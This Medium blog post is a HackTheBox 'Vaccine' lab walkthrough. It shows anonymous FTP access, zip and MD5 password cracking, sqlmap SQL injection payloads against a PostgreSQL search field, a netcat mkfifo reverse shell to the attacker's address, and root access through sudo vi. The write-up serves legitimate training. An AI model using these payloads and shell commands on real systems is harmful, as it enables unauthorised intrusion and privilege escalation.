Open in app

Sign in

Write

Sign in

HackTheBox | Vaccine

FarisArch
6 min readOct 29, 2021

--

If you think October is only the spooky month, well you’re wrong! October is also known as Cyber Security Month!.

To celebrate the month, HackTheBox renewed their Starting-Point which is a path for beginner that want to start hacking to learn. And I must say it is very well made.

HackTheBox! (Literally)

In the path they are 3 tiers., tier 0 ,tier 1 and lastly tier 2. What you’re going to read is a box from Tier 2 called Vaccine.

Vaccine Room rated as Easy.

Enumeration

First step is always enumeration! Enumeration is the key to victory.

NMAP

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.31
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzC28uKxt9pqJ4fLYmq/X5t7p44L+bUFQIDeEab29kDPnKdFOa9ijB5C5APVxLaAXVYSXATPYUqjIEWU98Vvvol1zuc82+KG9KfX94pD8TaPY2MZnoi9TfSxgwmKpmiRWR4DwwMS+mNo+WBU3sjB2QjgNip2vbiHxMitKeIfDLLFYiLKhc1eBRtooZ6DJzXQOMFp5QhSbZygWqebpFcsrmFnz9QWhx4MekbUnUVPKwCunycLi1pjrsmOAekbGz3/5R3H5tFSck915iqyc8bSkBZgRwW3FDJAXFmFgHG9fX727HsXFk8MXmVRMuH1LxGjvn1q3j27bb22QzprS7t9bJciWfwgt1sl57S0Q+iFbku83NgAFxUG373nspOHn08DwMllCyeLOG3Oy3x9zcCxMGATopiPckt8lb1GCWIvLPSNHMW12OyCKGM+AmLu4q9z7zX1YOUM6oxfn3qZVLKSZJ/DJu+aifv2BVNu/zJU2wdk1vFxysmQ4roj5O5I+H9x0=
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNsSORVFGkIbgItDm/mxmyPhpsIJihXV8y4CQiMTWGdEVQatXNIlXX0yGLZ4JFtPEX9rOGAp/eLZc0mGJtDyuyQ=
|   256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMXvk132UscLPAfaZyZ2Av54rpw9cP31OrloBE9v3SLW
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  • Lot’s of information to process don’t worry, take your time! Time is always on our side.
  • Now let’s choose a rabbit hole to go into.

FTP

  • From the NMAP scan, we can see that it says along the line of
Anonymous login is allowed.
  • That means we can login into the File Transfer Protocol (FTP for short) server without valid credentials.
  • When logged in, we can list out the files and directories inside the server.
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
  • A backup file? Let’s get that first and look around for more. If there is not anything, let’s get out of this server!
  • Trying to unzip the file, but it’s password protected! Crap.

John The Ripper

As hackers we always find a way to break something.

  • We can use a utility from John The Ripper (JTR for short) for cracking zip files password called zip2john.
  • Now we need a wordlist to crack it against, we’ll be using the famous rockyou.txt
  • After a while we get a result!

backup.zip:741852963::backup.zip:style.css, index.php:backup.zip

Looks like the password was 741852963

  • Unzipping the file it contains index.php and style.css
  • We’re more interested in the source code of index.php.
  • Looking around the source, we find PHP handling the login function of a site.
<?php
session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");
    }
  }
?>

So what’s its doing is if the POST password variable is set, check if the md5 hash of the password matches 2cb42f8734ea607eefed3b70af13bbd3.

  • So there is a login page on this server somewhere.
  • We could try to brute-force the password but that’s not working smart.
  • Since we have the hash of the password it wants, we can crack it to see what the value is
  • We’ll be using crackstation for this and we get it in a second.
admin:qwerty789

Web

  • Visiting the URL, we have a login page for MegaCorp.
  • Let’s use the credentials we found earlier.
  • And we’re able to login.
  • We’re presented with a list of tables of cars and there is a search box.
  • Since it’s fetching the data somewhere, it is possibly fetching from a database?
  • Let’s try a single quote in the search to see what happens.
ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%'%' ^

Okay so we have a possible SQL injection in our hands.

Exploit

  • We could do it manually but it’ll take some time so we’ll use a tool made specific for this called Sqlmap.
  • So what I do when dealing with SQL injections is I save the request using Burp Suite which is a Man In The Middle (MITM for short) tool and send to Sqlmap to reduce errors and it’s way easier.
Burp is a tool created by PortSwigger
GET /dashboard.php?search=3 HTTP/1.1
Host: 10.129.142.249
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.129.142.249/dashboard.php?search=2
Cookie: PHPSESSID=i8jmu9jjje1t69tjt27ouk1mu7
Upgrade-Insecure-Requests: 1

Now click save item.

  • So now we don’t have to supply any cookies or anything to SQLMAP when performing the request.

$ sqlmap -r ~/sql --batch --os-shell

  • The parameter search is indeed vulnerable to SQL injection. The DBMS in use is PostgresSQL.
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=3' AND (SELECT (CASE WHEN (4656=4656) THEN NULL ELSE CAST((CHR(86)||CHR(89)||CHR(99)||CHR(101)) AS NUMERIC) END)) IS NULL-- gQNp

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=3' AND 1330=CAST((CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (1330=1330) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(112)||CHR(113)) AS NUMERIC)-- FumX

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=3';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=3' AND 5698=(SELECT 5698 FROM PG_SLEEP(5))-- QKVO

By supplying os-shell, if it’s possible, SQLMAP will give us a shell back

  • And we do get a shell but it’s very unstable.
  • Before performing further, let’s get a better shell through reverse shell.

os-shell> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.31 9001 >/tmp/f

  • Now we have a better shell on port 9001

Post-Exploit

Now we’re in now what.

  • We are user postgres, we’re in the sudo groups somehow.
  • Try to run sudo but we need a password.
  • Always try with the passwords that we found incase there is any password reuse. But in this case there is not.
  • We do find a private key in .ssh but we don’t have a password to login with.
  • Now when you don’t know what to do, run linpeas. Linpeas is a linux enumeration tool.

Internal Enumeration

  • We have a few interesting findings :
/home/
/home/ftpuser/ftp/backup.zip
/home/simon/.bash_history
/root/
/var/lib/postgresql/.bash_history
/var/lib/postgresql/.psql_history
  • All the .bash_history is empty sadly.
  • Now since we know there is site, let’s check /var/www/html
  • We haven’t check dashboard.php so let’s check the source code of that.
  • We find out how it’s connecting to the database to fetch data.
try {
	  $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
	}

Hard coding credentials in source code isn’t really a great idea

  • Possible credentials :

postgres:P@s5w0rd!

  • Now let’s try sudo -l again.
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
  • Okay, first thing first let’s SSH into the server first for a more stable shell.

Privilege Escalation

  • Okay, we know that we can run sudo on /bin/vi /etc/postgresql/11/main/pg_hba.conf
  • If you’re unaware, vi is a command line text editor.
  • One thing that people don’t realize is that you can run commands while in vi (cool huh)
  • To do this, first let’s open up the file using sudo

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

  • Now we’re in vi mode.
  • Now hit the escape key (ESC), and we get a command bar on the bottom. It’s used for vi keybinds and all that cool stuff.
  • To run commands, first type : and followed by ! now type whatever command you want! I’ll be spawning a root shell.
:!/bin/bash
  • And we should be root now!
Hackthebox
Cybersecurity
Hacking
Tryhackme
Offensive Security

--

--

FarisArch
FarisArch

Written by FarisArch

36 Followers
4 Following

Cat lover that can blue team.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams